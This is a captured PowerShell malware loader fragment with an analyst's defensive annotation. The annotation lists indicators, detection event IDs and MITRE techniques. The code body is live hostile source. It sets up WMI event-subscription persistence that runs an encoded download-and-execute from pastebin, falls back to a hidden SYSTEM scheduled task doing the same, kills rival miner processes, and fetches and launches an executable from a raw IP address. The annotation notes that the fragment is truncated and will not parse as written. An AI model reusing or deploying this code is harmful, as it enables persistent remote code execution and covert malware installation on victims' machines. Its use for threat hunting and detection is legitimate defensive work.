<#
  Analyst annotation (defensive review of a captured PowerShell loader fragment).

  What the visible code does, in order:
    1. Deletes any existing WMI permanent event subscriptions named
       '_sysConsumer' and 'Systems Manage Consumer' (filter, consumer, binding).
    2. When the current identity contains "SYSTEM", creates a new WMI permanent
       event subscription ('wmilog4') whose consumer runs hidden, Base64-encoded
       PowerShell; a `Catch` block falls back to a SYSTEM scheduled task.
    3. Kills a list of named processes, then downloads config.json and x.exe from
       an HTTP host into %TEMP% and starts the executable hidden.

  Indicators present on this page (verbatim, for blocking/hunting):
    - WMI filter/consumer names: _sysConsumer, Systems Manage Consumer, wmilog4
    - Scheduled task name: \Microsoft\windows\.NET Framework\log4
    - Download base: http://183.102.83.247:7070/docs  (config.json, x.exe)
    - Dropped files: %TEMP%\kthmimu.exe, %TEMP%\config.json
    - pastebin raw URLs: https://pastebin.com/raw/QQWfHr8c and, inside the
      encoded command on the consumer line, https://pastebin.com/raw/7XQikL3U

  Detection / mitigation pointers (generic, not page-specific):
    - WMI subscription creation: Sysmon event IDs 19/20/21
      (WmiEventFilter / WmiEventConsumer / WmiEventConsumerToFilter);
      MITRE ATT&CK T1546.003.
    - Scheduled task creation: Security event 4698, Task Scheduler
      operational log; MITRE ATT&CK T1053.005.
    - Hidden/encoded PowerShell (-enc, -WindowStyle hidden, -ep bypass):
      PowerShell Script Block Logging (event 4104) and process-creation
      telemetry.
    - Enumerate and remove the subscription components above with
      Get-WmiObject -Namespace root\subscription on suspect hosts.

  Structural note: this fragment is truncated. The `if` opened below on the
  SYSTEM check is never closed in view, `Catch {` appears with no visible
  `Try`, and the final `if` on the Get-Process check is also left open; the
  surrounding statements presumably continue past the last line of the page.
#>

# --- 1. Remove prior/competing WMI persistence (filter, consumer, binding) ---
# Each line selects one subscription component by name (or by __Path for the
# binding) and pipes it to Remove-WmiObject. Presumably a cleanup of an older
# variant of the same loader; the names are useful hunting strings.
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='_sysConsumer'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='_sysConsumer'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%_sysConsumer%'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='Systems Manage Consumer'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='Systems Manage Consumer'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%Systems Manage Consumer%'" | Remove-WmiObject -Verbose

# --- 2. Privilege check and persistence ---
# $current = account name with the "DOMAIN\" (or "NT AUTHORITY\") prefix
# stripped by the regex replace. It is not referenced anywhere in the visible
# lines; the branch below re-reads GetCurrent().Name instead.
$current=[System.Security.Principal.WindowsIdentity]::GetCurrent().Name -replace "((.*)\\)", ""
# Only the SYSTEM identity takes the WMI-subscription path (root\subscription
# writes require administrative rights). NOTE(review): this `if` is not closed
# within the visible fragment.
if([System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Contains("SYSTEM")){
# Filter and consumer share the same innocuous-looking name; hunt for it.
$filterName = 'wmilog4'
$consumerName = 'wmilog4'
# WQL trigger: polls __InstanceModificationEvent for Win32_PerfFormattedData_PerfOS_System
# every 300 seconds (WITHIN 300). This class changes continuously, so the
# subscription effectively fires on a timer rather than on a specific event.
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
# Creates the __EventFilter in root\subscription (Sysmon 19). -ErrorAction Stop
# turns failure into a terminating error, which is what the later `Catch`
# presumably handles if a `Try` exists outside the visible text.
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
# CommandLineEventConsumer payload: 64-bit powershell.exe, hidden window,
# -enc (UTF-16LE Base64). Decoded, the argument is an Invoke-Expression of
# (New-Object System.Net.Webclient).DownloadString('https://pastebin.com/raw/7XQikL3U')
# -- i.e. remote stage-2 fetched and executed in memory each time the filter fires.
$Arg =@{
Name=$consumerName
CommandLineTemplate="C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -windowstyle hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwA3AFgAUQBpAGsATAAzAFUAJwApAA=="
}
# Consumer creation (Sysmon 20) and filter-to-consumer binding (Sysmon 21);
# the binding is what activates the persistence.
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments $Arg
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
# Fallback persistence when the WMI path throws. NOTE(review): no matching
# `Try {` is visible in this fragment, so as written this `Catch` is a parse
# error; it is presumably paired with text outside the page.
Catch {
# Scheduled task every 5 minutes, run as SYSTEM, named to blend in under
# \Microsoft\windows\.NET Framework. Uses the 32-bit (syswow64) PowerShell
# with -ep bypass -nop and IEX of a second pastebin raw URL. /F overwrites an
# existing task of the same name. Security event 4698 records the creation.
schtasks /create /sc MINUTE /mo 5 /tn "\Microsoft\windows\.NET Framework\log4" /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''https://pastebin.com/raw/QQWfHr8c'''))'" /F /ru System

# --- 3. Payload staging ---
# $cc  = download base (plain HTTP, non-standard port 7070) - network IoC.
# $dst / $dst1 = drop locations in the user/SYSTEM %TEMP% directory.
$cc="http://183.102.83.247:7070/docs"
$dst="$env:temp\kthmimu.exe"
$dst1="$env:temp\config.json"
# Terminates processes matching these names (wildcards expanded by Get-Process).
# The names resemble other miner/botnet binaries, so this presumably evicts
# competing infections; "*kthreaddi]" looks like a mangled pattern rather than
# an intentional one. Errors for absent processes are silenced.
Get-Process network0*, *kthreaddi], kthreaddi, kthreaddk, sysrv012, sysrv011, sysrv010, sysrv00* -ErrorAction SilentlyContinue | Stop-Process
# If the dropped executable is not already running, fetch config + binary and
# launch it hidden. No integrity check on the download, no TLS. The file name
# kthmimu.exe and the config.json companion are file-system IoCs.
# NOTE(review): this `if` is also left open by the end of the visible fragment.
if (!(Get-Process kthmimu -ErrorAction SilentlyContinue)) {
(New-Object Net.WebClient).DownloadFile("$cc/config.json", "$dst1")
(New-Object Net.WebClient).DownloadFile("$cc/x.exe", "$dst")
Start-Sleep -Seconds 1
Start-Process "$dst" -windowstyle hidden